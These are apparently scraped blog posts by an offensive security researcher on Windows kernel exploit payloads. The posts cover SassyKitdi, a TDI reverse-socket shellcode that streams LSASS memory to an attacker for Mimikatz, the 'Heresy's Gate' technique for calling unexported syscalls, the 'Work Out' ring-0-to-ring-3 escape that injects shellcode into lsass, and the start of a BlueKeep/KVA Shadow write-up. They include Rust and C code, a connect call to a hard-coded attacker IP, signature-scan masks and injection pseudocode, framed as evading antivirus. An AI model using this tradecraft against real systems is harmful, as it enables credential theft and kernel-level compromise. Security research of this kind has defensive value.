❌

Reading view

There are new articles available, click to refresh the page.

SassyKitdi: Kernel Mode TCP Sockets + LSASS Dump

Introduction

This post describes a kernel mode payload for Windows NT called "SassyKitdi" (LSASS + Rootkit + TDI). This payload is of a nature that can be deployed via remote kernel exploits such as EternalBlue, BlueKeep, and SMBGhost, as well as from local kernel exploits, i.e. bad drivers. This exploit payload is universal from (at least) Windows 2000 to Windows 10, and without having to carry around weird DKOM offsets.

The payload has 0 interaction with user-mode, and creates a reverse TCP socket using the Transport Driver Interface (TDI), a precursor to the more modern Winsock Kernel (WSK). The LSASS.exe process memory and modules are then sent over the wire where they can be transformed into a minidump file on the attacker's end and passed into a tool such as Mimikatz to extract credentials.

tl;dr: PoC || GTFO GitHub

The position-independent shellcode is ~3300 bytes and written entirely in the Rust programming language, using many of its high level abstractions. I will outline some of the benefits of Rust for all future shellcoding needs, and precautions that need to be taken.

Figure 0: An oversimplification of the SassyKitdi methodology.

I don't have every AV on hand to test against obviously, but given that most AV misses obvious user-mode stuff thrown at it, I can only assume there is currently almost universal ineffectiveness of antivirus available being able to detect the methodology.

Finally, I will discuss what a future kernel mode rootkits could look like, if one took this example a couple steps further. What's old is new again.

Transport Driver Interface

TDI is an old school method to talk to all types of network transports. In this case it will be used to create a reverse TCP connection back to the attacker. Other payloads such as Bind Sockets, as well as UDP, would follow a similar methodology.

The use of TDI in rootkits is not exactly widespread, but it has been documented in the following books which served as references for this code:

  • Vieler, R. (2007). Professional Rootkits. Indianapolis, IN: Wiley Technology Pub.
  • Hoglund, G., & Butler, J. (2009). Rootkits: Subverting the Windows Kernel. Upper Saddle River, NJ: Addison-Wesley.

Opening the TCP Device Object

TDI device objects are found by their device name, in our case \Device\Tcp. Essentially, you use the ZwCreateFile() kernel API with the device name, and pass options in through the use of our old friend File Extended Attributes.


pub type ZwCreateFile = extern "stdcall" fn(
FileHandle: PHANDLE,
AccessMask: ACCESS_MASK,
ObjectAttributes: POBJECT_ATTRIBUTES,
IoStatusBlock: PIO_STATUS_BLOCK,
AllocationSize: PLARGE_INTEGER,
FileAttributes: ULONG,
ShareAccess: ULONG,
CreateDisposition: ULONG,
CreateOptions: ULONG,
EaBuffer: PVOID,
EaLength: ULONG,
) -> NTSTATUS;

The device name is passed in the ObjectAttributes field, and the configuration is passed in the EaBuffer. We must create a Transport handle (FEA: TransportAddress) and a Connection handle (FEA: ConnectionContext).

The TransportAddress FEA takes a TRANSPORT_ADDRESS structure, which for IPv4 consists of a few other structures. It is at this point that we can choose which interface to bind to, or which port to use. In our case, we will choose 0.0.0.0 with port 0, and the kernel will bind us to the main interface with a random ephemeral port.


#[repr(C, packed)]
pub struct TDI_ADDRESS_IP {
pub sin_port: USHORT,
pub in_addr: ULONG,
pub sin_zero: [UCHAR; 8],
}

#[repr(C, packed)]
pub struct TA_ADDRESS {
pub AddressLength: USHORT,
pub AddressType: USHORT,
pub Address: TDI_ADDRESS_IP,
}

#[repr(C, packed)]
pub struct TRANSPORT_ADDRESS {
pub TAAddressCount: LONG,
pub Address: [TA_ADDRESS; 1],
}

The ConnectionContext FEA allows setting of an arbitrary context instead of a defined struct. In the example code we just set this to NULL and move on.

At this point we have created the Transport Handle, Transport File Object, Connection Handle, and Connection File Object.

Connecting to an Endpoint

After initial setup, the rest of TDI API is performed through IOCTLs to the device object associated with our File Objects.

TDI uses IRP_MJ_INTERNAL_DEVICE_CONTROL with various minor codes. The ones we are interested in are:


#[repr(u8)]
pub enum TDI_INTERNAL_IOCTL_MINOR_CODES {
TDI_ASSOCIATE_ADDRESS = 0x1,
TDI_CONNECT = 0x3,
TDI_SEND = 0x7,
TDI_SET_EVENT_HANDLER = 0xb,
}

Each of these internal IOCTLs has various structures associated with them. The basic methodology is to:

  1. Get the Device Object from the File Object using IoGetRelatedDeviceObject()
  2. Create the internal IOCTL IRP using IoBuildDeviceIoControlRequest()
  3. Set the opcode inside IO_STACK_LOCATION.MinorFunction
  4. Copy the op's struct pointer to the IO_STACK_LOCATION.Parameters
  5. Dispatch the IRP with IofCallDriver()
  6. Wait for the operation to complete using KeWaitForSingleObject() (optional)

For the TDI_CONNECT operation, the IRP parameters includes a TRANSPORT_ADDRESS structure (defined in the previous section). This time, instead of setting it to 0.0.0.0 port 0, we set it to the values of where we want to connect (and, in big endian).

Sending Data Over the Wire

If the connection IRP succeeds in establishing a TCP connection, we can then send TDI_SEND IRPs to the TCP device.

The TDI driver expects a Memory Descriptor List (MDL) that describes the buffer to send over the network.

Assuming we want to send some arbitrary data over the wire, we must perform the following steps:

  1. ExAllocatePool() a buffer and RtlCopyMemory() the data over (optional)
  2. IoAllocateMdl() providing the buffer address and size
  3. MmProbeAndLockPages() to page-in during the send operation
  4. Dispatch the Send IRP
  5. The I/O manager will unlock the pages and free the MDL
  6. ExFreePool() the buffer (optional)

In this case the MDL is attached to the IRP. The Parameters structure we can just set SendFlags to 0 and SendLength to the data size.


#[repr(C, packed)]
pub struct TDI_REQUEST_KERNEL_SEND {
pub SendLength: ULONG,
pub SendFlags: ULONG,
}

Dumping LSASS from Kernel Mode

LSASS is of course the goldmine on Windows, where prizes such as cleartext credentials and kerberos information can be obtained. Many AV vendors are getting better at hardening LSASS when attempting to dump from user-mode. But we'll do it from the privilege of the kernel.

Mimikatz requires 3 streams to process a minidump: System Information, Memory Ranges, and Module List.

Obtaining Operating System Information

Mimikatz really only needs to know the Major, Minor, and Build versions of NT. This can be obtained with the NTOSKRNL exported function RtlGetVersion() that provides the following struct:


#[repr(C)]
pub struct RTL_OSVERSIONINFOW {
pub dwOSVersionInfoSize: ULONG,
pub dwMajorVersion: ULONG,
pub dwMinorVersion: ULONG,
pub dwBuildNumber: ULONG,
pub dwPlatformId: ULONG,
pub szCSDVersion: [UINT16; 128],
}

Scraping All Memory Regions

Of course, the most important part of an LSASS dump is the actual memory of the LSASS process. Using KeStackAttachProcess() allows one to read the virtual memory of LSASS. From there it is possible to iterate over memory ranges with ZwQueryVirtualMemory().


pub type ZwQueryVirtualMemory = extern "stdcall" fn(
ProcessHandle: HANDLE,
BaseAddress: PVOID,
MemoryInformationClass: MEMORY_INFORMATION_CLASS,
MemoryInformation: PVOID,
MemoryInformationLength: SIZE_T,
ReturnLength: PSIZE_T,
) -> crate::types::NTSTATUS;

Pass in -1 for the ProcessHandle, 0 for the initial BaseAddress, and use the MemoryBasicInformation class to receive the following struct:


#[repr(C)]
pub struct MEMORY_BASIC_INFORMATION {
pub BaseAddress: PVOID,
pub AllocationBase: PVOID,
pub AllocationProtect: ULONG,
pub PartitionId: USHORT,
pub RegionSize: SIZE_T,
pub State: ULONG,
pub Protect: ULONG,
pub Type: ULONG,
}

For the next iteration of ZwQueryVirtualMemory(), just set the next BaseAddress to BaseAddress+RegionSize. Keep iterating until ReturnLength is 0 or there is an NT error.

Collecting List of Loaded Modules

Mimikatz also requires to know where a few of the DLLs are located in memory in order to scrape some secrets out of them during processing.

The most convenient way to iterate these is to grab the DLL list out of the PEB. The PEB can be found using ZwQueryInformationProcess() with the ProcessBasicInformation class.

Mimikatz requires the DLL name, address, and size. These are easily scraped out of PEB->Ldr.InLoadOrderLinks, which is a well-documented methodology to obtain the linked list of LDR_DATA_TABLE_ENTRY entries.


#[cfg(target_arch="x86_64")]
#[repr(C, packed)]
pub struct LDR_DATA_TABLE_ENTRY {
pub InLoadOrderLinks: LIST_ENTRY,
pub InMemoryOrderLinks: LIST_ENTRY,
pub InInitializationOrderLinks: LIST_ENTRY,
pub DllBase: PVOID,
pub EntryPoint: PVOID,
pub SizeOfImage: ULONG,
pub Padding_0x44_0x48: [BYTE; 4],
pub FullDllName: UNICODE_STRING,
pub BaseDllName: UNICODE_STRING,
/* ...etc... */
}

Just iterate the linked list til you wind back at the beginning, grabbing FullDllName, DllBase, and SizeOfImage of each DLL for the dump file.

Notes on Shellcoding in Rust

Rust is one of the more modern languages trending these days. It does not require a run-time and can be used to write extremely low-level embedded code that interacts with C FFI. To my knowledge there are only a few things that C/C++ can do that Rust cannot: C variadic functions (coming soon) and SEH (outside of internal panic operations?).

It is simple enough to cross-compile Rust from Linux using the mingw-w64 linker, and use Rustup to add the x86_64-windows-pc-gnu target. I create a DLL project and extract the code between _DllMainCRTStartup() and malloc(). Not very stable perhaps, but I could only figure out how to generate PE files and not something such as a COM file.

Here's an example of how nice shellcoding in Rust can be:


let mut socket = nttdi::TdiSocket::new(tdi_ctx);

socket.add_recv_handler(recv_handler);
socket.connect(0xdd01a8c0, 0xBCFB)?; // 192.168.1.221:64444

socket.send("abc".as_bytes().as_ptr(), 3)?;

Compiler Optimizations

Rust sits atop LLVM, an intermediate language before final code generation, and thus benefits from many of the optimizations that languages such as C++ (Clang) have received over the years.

I won't get too deep into the weeds, especially with zealots on all sides, but the highly static compilation nature of Rust often results in much smaller code size than C or C++. Code size is not necessarily an indicator of performance, but for shellcode it is important. You can do your own testing, but Rust's code generation is extremely good.

We can set the Cargo.toml file to use opt-level='z' (optimize for size) lto=true (link time optimize) to further reduce generated code size.

Using High-Level Constructs

The most obvious high-level benefit of using Rust is RAII. In Windows this means HANDLEs can be automatically closed, kernel pools automatically freed, etc. when our encapsulating objects go out of scope. Simple constructors and destructors such as these examples are aggressively inlined with our Rust compiler flags.

Rust has concepts such as "Result<Ok, Err>" return types, as well as the ? 'unwrap or throw' operator, which allows us to bubble up errors in a streamlined fashion. We can return tuples in the Ok slot, and NTSTATUS codes in the Err slot if something goes wrong. The code generation for this feature is minimal, often returning a double wide struct. The bookkeeping is basically equivalent to the amount of bytes it would take to do by hand, but simplifies the high level code considerably.

For shellcoding purposes, we cannot use the "std" library (to digress, well, we could add an allocator), and must use Rust "core" only. Further, many open-source crate libraries are off-limits due to causing the code to not be position independent. For this reason, a new crate called `ntdef` was created, which simply contains only definitions of types and 0 static-positioned information. Oh, and if you ever need stack-based wide-strings (perhaps something else missing from C), check out JennaMagius' stacklstr crate.

Due to the low-level nature of the code, its FFI interactions with the kernel, and having to carry around context pointers, most of the shellcode is "unsafe" Rust code.

Writing shellcode by hand is tedious and results in long debug sessions. The ability to write the assembly template in a high-level abstraction language like Rust saves enormous amounts of time in research and development. Handcrafted assembly will always result in smaller code size, but having a guide to go off of is of great benefit. After all, optimizing compilers are written by humans, and all edge cases are not taken into account.

Conclusion

SassyKitdi must be performed at PASSIVE_LEVEL. To use the sample project in an exploit payload, you will need to provide your own exploit preamble. This is the unique part of the exploit that cleans up the stack frame, and in e.g. EternalBlue lowers the IRQL from DISPATCH_LEVEL.

What is interesting to consider is turning the use of a TDI exploit payload into the staging for a kernel-mode Meterpreter like framework. It is very easy to tweak the provided code to instead download and execute a larger secondary kernel-mode payload. This can take the form of a reflectively-loaded driver. Such a framework would have easy access to tokens, files, and many other functionalities that are currently getting caught by AV in user-mode. This initial staging shellcode can be hand-shrunk to approximately 1000-1500 bytes.

"Heresy's Gate": Kernel Zw*/NTDLL Scraping + "Work Out": Ring 0 to Ring 3 via Worker Factories

IntroductionΒ 

What's in a name? Naming things is the first step in being able to talk about them.

What's a lower realm than Hell? Heresy is the 6th Circle of Hell in Dante's Inferno.

With Hell's Gate scraping syscalls in user-mode, you can think about Heresy's Gate as the generic methodology to dynamically generate and execute kernel-mode syscall stubs that are not exported by ntoskrnl.exe. Much like Hell's Gate, the general idea has been discussed previously (in this case since at least NT 4), however older techniques (Nebbett's Gate) no longer work and this post may introduce new methods.

A proud people who believe in political throwback, that's not all I'm here to present you.

Unlocking Heresy's Gate, among other things, gives access to a plethora of novel Ring 0 (kernel) to Ring 3 (user) transitions, as is required by exploit payloads in EternalBlue (DoublePulsar), BlueKeep, and SMBGhost. Just to name a few.

I will describe such a method, Work Out, using the undocumented Worker Factory feature that is the kernel backbone of the user-mode Thread Pool API added in Windows Vista.

tl;dr: PoC || GTFO GitHub

All of this information was casually shared with a member of MSRC and forwarded to the Windows Defender team prior to publication. These are not vulnerabilities; Heresy's Gate is rootkit tradecraft to execute private syscalls, and Work Out is a new kernel mode exploit payload.

I have no knowledge of if/how/when mitigations/ETW/etc. may be added to NT.

Heresy's GateΒ 

Many fun routines are not readily exported by the Executive binary (ntoskrnl.exe). They simply do not exist in import/export directories for any module. And with their ntoskrnl.exe file/RVA offsets changing between each compile, they can be difficult to find in a generic way. Not exactly ASLR, but similar.

However, if a syscall exists, NTDLL.DLL/USER32.DLL/WIN32U.DLL are gonna have stubs for them.

  • Heaven's Gate: Execute 64-bit syscalls in WoW64 (32-bit code)
  • Hell's Gate: Execute syscalls in user-mode direcly by scraping ntdll op codes
  • Heresy's Gate: Execute unexported syscalls in kernel-mode (described here by scraping ntdll and &ZwReadFile)

I'll lump Heaven's gate into this, even though it is only semi-related. Alex Ionescu has written about how CFG killed the original technique.

I guess if you went further up the chain than WoW64, or perhaps something fancy in managed code land or a Universal Windows Platform app, you'd have a Higher Gate? And since Heresy is only the sixth circle, there's still room to go lower... HAL's Gate?

Closing Nebbett's GateΒ 

People have been heuristically scanning function signatures and even disassembling in the kernel for ages to find unexported routines. I wondered what the earliest reference would be for executing an unexported routine.

Gary Nebbett describes in pages 433-434 of "Windows NT/2000 Native API Reference" about finding unexported syscalls in ntdll and executing their user-mode stubs directly in kernel mode!

Interesting indeed. I thought: there's no way this code could still work!

Open questions:

  1. There must be issues with how the syscall stub has changed over the years?
  2. Can modern "syscall" instruction (not int 0x2e) even execute in kernel mode?
  3. There's probably issues with modern kernels implementing SMEP (though you could just Capcom it and piss off PatchGuard in your payload).
  4. Will this screw up PreviousMode and we need user buffers and such?
  5. Aren't these ntdll functions often hooked by user-mode antivirus code?
  6. What about the logic of Meltdown KVA Shadow?

Meltdown KVA Shadow Page Fault LoopΒ 

And indeed, it seems that the Meltdown KVA Shadow strikes again to spoil our exploit payload fun.

I attempted this method on Windows 10 x64 and to my surprise I did not immediately crash! However, my call to sc.exe appeared to hang forever.

Let's peek at what the thread is doing:

Oof, it appears to be in some type of a page fault loop. Indeed setting a breakpoint on KiPageFaultShadow will cause it to hit over and over.

Maybe this and all the other potential issues could be worked around?

Instead of fighting with Meltdown patch and all the other outstanding issues, I decided to scrape opcodes out of NTDLL and copy an exported Zw function stub out of the Executive.

NTDLL Opcode ScrapingΒ 

To scrape an opcode number out of NTDLL, we must find its Base Address in kernel mode. There are at least 3 ways to accomplish this.

  1. You can map it out of a processes PEB->Ldr using PsGetProcessPeb() while under KeStackAttachProcess().
  2. You can call ZwQuerySystemInformation() with the SystemModuleInformation class.
  3. You can look it up in the KnownDlls section object.

KnownDlls Section ObjectΒ 

I thought the last one is the most interesting and perhaps less known for antivirus detection methods, so we'll go with that. However, I think if I was writing a shellcode I'd go with the first one.


NTSTATUS NTAPI GetNtdllBaseAddressFromKnownDlls(
_In_ ZW_QUERY_SECTION __ZwQuerySection,
_Out_ PVOID *OutAddress
)
{
static UNICODE_STRING KnownDllsNtdllName =
RTL_CONSTANT_STRING(L"\\KnownDlls\\ntdll.dll");

NTSTATUS Status = STATUS_SUCCESS;

OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
InitializeObjectAttributes(
&ObjectAttributes,
&KnownDllsNtdllName,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
0,
NULL
);

HANDLE SectionHandle = NULL;

Status = ZwOpenSection(&SectionHandle, SECTION_QUERY, &ObjectAttributes);

if (NT_SUCCESS(Status))
{
// +0x1000 because kernel only checks min size
UCHAR SectionInfo[0x1000];

Status = __ZwQuerySection(
SectionHandle,
SectionImageInformation,
&SectionInfo,
sizeof(SectionInfo),
0
);

if (NT_SUCCESS(Status))
{
*OutAddress =
((SECTION_IMAGE_INFORMATION*)&SectionInfo)
->TransferAddress;
}

ZwClose(SectionHandle);
}

return Status;
}

This requires the following struct definition:


typedef struct _SECTION_IMAGE_INFORMATION {
PVOID TransferAddress;
// ...
} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;

Once you have the NTDLL base address, it is a well-known process to read the PE export directory to find functions by name/ordinal.

Extracting Syscall OpcodeΒ 

Let's inspect an NTDLL syscall.

Note: Syscalls have changed a lot over the years.

However, the MOV EAX, #OPCODE part is probably pretty stable. And since syscalls are used as a table index; they are never a larger value than 0xFFFF. So the higher order bits will be 0x0000.

You can scan for the opcode using the following mask:


CHAR WildCardByte = '\xff';

// b8 ?? ?? 00 00 mov eax, 0x0000????
UCHAR NtdllScanMask[] = "\xb8\xff\xff\x00\x00";

Dynamically Cloning a Zw CallΒ 

So we have the opcode from the user-mob stub, now we need to create the kernel-mode stub to call it. We can accomplish this by cloning an existing stub.

ZwReadFile() is pretty generic, so let's go with that.

The MOV EAX instruction right before the final JMP is the syscall opcode. We'll have to overwrite it with our desired opcode.

Fixing nt!KiService* Relative 32 AddressesΒ 

So, the LEA and JMP instruction use relative 32-bit addressing. That means it is a hardcoded offset within +/-2GB of the end of the instruction.

Converting the relative 32 address to its 64-bit full address is pretty simple code:


static inline
PVOID NTAPI
ConvertRelative32AddressToAbsoluteAddress(
_In_reads_(4) PUINT32 Relative32StartAddress
)
{
UINT32 Offset = *Relative32StartAddress;
PUCHAR InstructionEndAddress =
(PUCHAR)Relative32StartAddress + 4;

return InstructionEndAddress + Offset;
}

Since our little stub will not be within +/- 2GB space, we'll have to replace the LEA with a MOVABS, and the JMP (rel32) with a JMP [$+0].

I checked that this mask is stable to at least Windows 7, and probably way earlier.


UCHAR KiServiceLinkageScanMask[] =
"\x50" // 50 push rax
"\x9c" // 9c pushfq
"\x6a\x10" // 6a 10 push 10h
"\x48\x8d\x05\x00\x00\x00\x00"; // 48 8d 05 ?? ?? ?? ??
// lea rax, [nt!KiServiceLinkage]

UCHAR KiServiceInternalScanMask[] =
"\x50" // 50 push rax
"\xb8\x00\x00\x00\x00" // b8 ?? ?? ?? ?? mov eax, ??
"\xe9\x00\x00\x00\x00"; // e9 ?? ?? ?? ?? jmp nt!KiServiceInternal

Create a Heretic Call StubΒ 

So now that we've scanned all the offsets we can perform a copy. Allocate the stub, keeping in mind our new stub will be larger because of the MOVABS and JMP [$+0] we are adding. You'll have to do a couple of memcpy's using the mask scan offsets where we are going to replace the LEA and JMP rel-32 instructions. This clone step is only mildly annoying, but easy to mess up.

Next perform the following fixups:

  1. Overwrite the syscall opcode
  2. Change the LEA relative-32 to a MOVABS instruction
  3. Change the JMP relative-32 to a JMP [$+0]
  4. Place the nt!KiServiceInternal pointer at $+0

Now just cast it to a function pointer and call it!

Work OutΒ 

The Windows 10 Executive does now export some interesting functions like RtlCreateUserThread, no Heresy needed!, so an ultramodern payload likely has it easy. This was not the case when I checked the Windows 7 Executive (did not check 8).

Heresy's Gate techniques gets you access to ZwCreateThread(Ex). You could also build out a ThreadContinue primitive using ZwSetContextThread. Also, PsSetContextThread is readily exported.

Well Known Ring 0 EscapesΒ 

I will describe a new method about how to escape with Worker Factories, however first let's gloss over existing methodologies being used.

Queuing a User Mode APCΒ 

Right now, all the hot exploits, malwares, and antiviruses seem to always be queuing user-mode Asynchronous Procedure Calls (APCs).

As far as I can tell, it's because _sleepya copypasta'd me (IMPORTANT: no disrespect whatsoever, everyone in this copypasta chain made MASSIVE improvements to eachother) and I copypasta'd the Equation Group who copypasta'd Barnaby Jack, and people just use the available method because it's off-the-shelf code.

I originally got the idea from Luke Jenning's writeup on DoublePulsar's process injection, and through further analysis optimized a few things including the overall shellcode size to 14.41% the original size.

APCs are a very complicated topic and I don't want to get too in the weeds. At a high level, they are how I/O callbacks can return data back to usermode, asynchronously without blocking. You can think of it like the heart of the Windows epoll/kqueue methods. Essentially, they help form a proactor (vs. reactor) pattern that fixed NT creator David Cutler's issues with Unix.

He expressed his low opinion of the Unix process input/output model by reciting "Get a byte, get a byte, get a byte byte byte" to the tune of the finale of Rossini's William Tell Overture.[citation needed]

It's worth noting Linux (and basically all modern operating systems) now have proactor pattern I/O facilities.

At any rate, the psuedo-code workflow is as follows:


target_thread = ...

KeInitializeApc(
&apc,
target_thread,
mode = both,
kernel_func = &kapc,
user_func = NOT_NULL
);

KeInsertQueueApc(&apc);

--- ring 0 apc ---

kapc:
mov cr8, PASSIVE_LEVEL

*NormalRoutine = ZwAllocateVirtualMemory(RWX)
_memcpy(*NormalRoutine, user_start)

mov cr8, APC_LEVEL

--- ring 3 apc ---

user_start:
CreateThread(&calc_shellcode)

calc_shellcode:
  1. Find an Alertable + Waiting State thread.
  2. Create an APC on the thread.
  3. Queue the APC.
  4. In kernel routine, drop IRQL and allocate payload for the user-mode NormalRoutine.
  5. In user mode, spawn a new thread from the one we hijacked.

There's even more plumbing going on under the hood and it's actually a pretty complicated process. Do note that at least all required functions are readily exported. You can also do it without a kernel-mode APC, so you don't have to manually adjust the IRQL (however the methodology introduces its own complexities).

Also note that the target thread not only needs to be Alertable, it needs to be in a Waiting State, which is fairly hard to check in a cross-version way. You can DKOM traverse EPROCESS.ThreadListHead backwards as non-Alertable threads are always the first ones. If the thread is not in a Waiting State, the call to KeInsertQueueApc will return an NT error. The injected process will also crash if TEB.ActivationContextStackPointer is NULL.

A more verbose version of the technique I believe was first described in 2005 by Barnaby Jack in the paper Remote Windows Kernel Exploitation: Step Into the Ring 0. The technique may have been known before 2005, however this is not documented functionality so would be rare for a normal driver writer to have stumbled on it. Matt Suiche attempted to document the history of the APC technique and has a similar finding as Barnaby Jack being the original discoverer.

Driver code that implements the APC technique to inject a DLL into a process from the kernel is provided by Petr BeneΕ‘. There's also a writeup with some C code in the Vault7 leak.

The method is also available in x64 assembly in places such as the Metasploit BlueKeep exploit; sleepya_ and I have (noncollaboratively) built upon eachother's work over the past few years to improve the payload. Indeed this shellcode is the basis for the SMBGhost exploits released by both ZecOps and chompy1337.

This abuse of APC queuing has been such a thorn in Microsoft's side that they added ETW tracing for antivirus to it, on more recent versions the tail end of NtQueueApcThreadEx() calls EtwTiLogQueueApcThread(). There have been some documented bypasses. There's also been issues in SMBGhost where CFG didn't like the user mode APC start address, which hugeh0ge found a workaround for.

SharedUserData SystemCall Hook (+ Others)Β 

APCs are one of several methods described by bugcheck and skape in Uninformed's Windows Kernel-Mode Payload Fundamentals. Another is called SharedUserData SystemCall Hook.

The only exploit prior to EternalBlue in Metasploit that required this type of kernel mode payload was MS09-050, in x86 shellcode only.

Stephen Fewer had a writeup of how the MS09-050 Metasploit shellcode performed this system call hook.

  1. Hook syscall MSR.
  2. Wait for desired process to make a syscall.
  3. Allocate the payload.
  4. Overwrite the user-mode return address for the syscall at the desired payload.

There's a bit of glue required to fix up the hijacked thread.

Worker Factory InternalsΒ 

Why Worker Factories? They're ETW detecting us with APCs, dog; it's time to evolve.

I was originally investigating Worker Factories as a potential user mode process migration technique that avoided the CreateRemoteThread() and QueueUserApc() primitives (and many similar well-known methods).

I discovered you cannot create a Worker Factory in another process. However, in Windows 10 all processes that load ntdll receive a thread pool, and thus implicitly have a Worker Factory! To speed up loading DLLs or something.

I was able to succeed in messing with the properties of this default Worker Factory, but I did not readily see a way to update the start routine for threads in the pool. I also some some pointers in NTDLL thread pool functions which perhaps could be adjusted to get the process migration to pop. More research is needed.

I instead decided to try it as a Ring 0 escape, and here we are.

NTDLL Thread Pool ImplementationΒ 

Worker Factories are handles that ntdll communicates with when you use the Thread Pool APIs. These essentially just let you have user-mode work queues that you can post tasks to. Most of the logic is inside ntdll, with the function prefixes Tp and Tpp. This is good, because it means the environment can be adjusted without a context switch, and generally adding additional complexity to kernels should be avoided when possible.

It is very easy to create a worker factory, and a process can have many of them. The Windows Internals books has a few pages on them (here is from older 5th edition).

The entire kernel mode API is implemented with the following syscalls:

  1. ZwCreateWorkerFactory()
  2. ZwQueryInformationWorkerFactory()
  3. ZwSetInformationWorkerFactory()
  4. ZwWaitForWorkViaWorkerFactory()
  5. ZwWorkerFactoryWorkerReady()
  6. ZwReleaseWorkerFactoryWorker()
  7. ZwShutdownWorkerFactory()

As ntdll does all the heavy lifting, nothing in the kernel interacts with these functions. As such they are not exported, and require Heresy's Gate.

ntdll creates a worker factory, adjusts its parameters such as minimum threads, and uses the other syscalls to inform the kernel that tasks are ready to be run. Worker threads will eat the user-mode work queues to exhaustion before returning to the kernel to wait to be explicitly released again.

The main takeaway so far is: the kernel creates and manages the threads. ntdll manages the work items in the queue.

Creating a Worker FactoryΒ 

The create syscall has the following prototype:


NTSTATUS NTAPI
ZwCreateWorkerFactory(
_Out_ PHANDLE WorkerFactoryHandleReturn,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE CompletionPortHandle,
_In_ HANDLE WorkerProcessHandle,
_In_ PVOID StartRoutine,
_In_opt_ PVOID StartParameter,
_In_opt_ ULONG MaxThreadCount,
_In_opt_ SIZE_T StackReserve,
_In_opt_ SIZE_T StackCommit
);

The most interesting parameter for us is the StartRoutine/StartParameter. This will be our Ring 3 code we wish to execute, and anything we want to pass it directly.

The WorkerProcessHandle parameter accepts the generic "current process" handle of -1, so there is no need to create a proper handle for the process if you are already in the same process context. In kernel mode, this means using KeStackAttachProcess(). As I mentioned earlier, you cannot create a Worker Factory for another process.

The reverse engineered psuedocode is:


ObpReferenceObjectByHandleWithTag(
WorkerProcessHandle,
...,
PsProcessType,
&Process
);

if (KeGetCurrentThread()->ApcState.Process != Process)
{
return STATUS_INVALID_PARAMETER;
}

The create function also requires an I/O completion port. This can be gained using ZwCreateIoCompletion(), which is a readily exported function by the Executive.

You also must specify some access rights for the WorkerFactoryHandle:


#define WORKER_FACTORY_RELEASE_WORKER 0x0001
#define WORKER_FACTORY_WAIT 0x0002
#define WORKER_FACTORY_SET_INFORMATION 0x0004
#define WORKER_FACTORY_QUERY_INFORMATION 0x0008
#define WORKER_FACTORY_READY_WORKER 0x0010
#define WORKER_FACTORY_SHUTDOWN 0x0020

#define WORKER_FACTORY_ALL_ACCESS ( \
STANDARD_RIGHTS_REQUIRED | \
WORKER_FACTORY_RELEASE_WORKER | \
WORKER_FACTORY_WAIT | \
WORKER_FACTORY_SET_INFORMATION | \
WORKER_FACTORY_QUERY_INFORMATION | \
WORKER_FACTORY_READY_WORKER | \
WORKER_FACTORY_SHUTDOWN \
)

greetz to Process Hacker for the reversing of these definitions. However, these evaluate to 0xF003F, and the modern Windows 10 ntdll creates with the mask: 0xF00FF. We only really need WORKER_FACTORY_SET_INFORMATION, but passing a totally full mask shouldn't be an issue (even on older versions).

Adjusting Worker Factory Minimum ThreadsΒ 

By default, it appears just creating a Worker Factory does not immediately gain you any new threads in the target process.

However, you can tune the minimum amount of threads with the following function:


NTSTATUS WINAPI
NtSetInformationWorkerFactory(
_In_ HANDLE WorkerFactoryHandle,
_In_ ULONG WorkerFactoryInformationClass,
_In_ PVOID WorkerFactoryInformation,
_In_ ULONG WorkerFactoryInformationLength
);
The enumeration of options:

typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // q; s: LARGE_INTEGER
WorkerFactoryRetryTimeout, // q; s: LARGE_INTEGER
WorkerFactoryIdleTimeout, // q; s: LARGE_INTEGER
WorkerFactoryBindingCount,
WorkerFactoryThreadMinimum, // q; s: ULONG
WorkerFactoryThreadMaximum, // q; s: ULONG
WorkerFactoryPaused, // ULONG or BOOLEAN
WorkerFactoryBasicInformation, // WORKER_FACTORY_BASIC_INFORMATION
WorkerFactoryAdjustThreadGoal,
WorkerFactoryCallbackType,
WorkerFactoryStackInformation, // 10
WorkerFactoryThreadBasePriority,
WorkerFactoryTimeoutWaiters, // since THRESHOLD
WorkerFactoryFlags,
WorkerFactoryThreadSoftMaximum,
WorkerFactoryThreadCpuSets, // since REDSTONE5
MaxWorkerFactoryInfoClass
} WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS;

Shout out again to Process Hacker for providing us with these definitions.

Step Into the Ring 3Β 

The psuedo-code workflow for Work Out is as follows:


PsLookupProcessByProcessId(pid, &lsass)

KeStackAttachProcess(lsass)

start_addr = ZwAllocateVirtualMemory(RWX)
_memcpy(start_addr, shellcode)

ZwCreateIoCompletion(&hio)

__ZwCreateWorkerFactory(&hWork, hio, start_addr)

__ZwSetInformationWorkerFactory(hWork, min_threads = 1)

KeUnstackDetachProcess(lsass)

ObDereferenceObject(lsass)
  1. Attach to the process.
  2. Allocate the user mode payload.
  3. Create an I/O completion handle.
  4. Create a worker factory with the the start routine being the payload.
  5. Adjust minimum threads to 1.

Reference inect.c GitHub in the PoC code.

ConclusionΒ 

I have left other ideas in this post for Ring 0 Escapes that may be worth PROOFing out as an open problem to the reader.

If you think of other techniques for Heresy's Gate or Ring 0 Escapes, or just want to troll me, be sure to leave a comment!

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

BackgroundΒ 

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode

β€” Worawit Wang (@sleepya_) November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

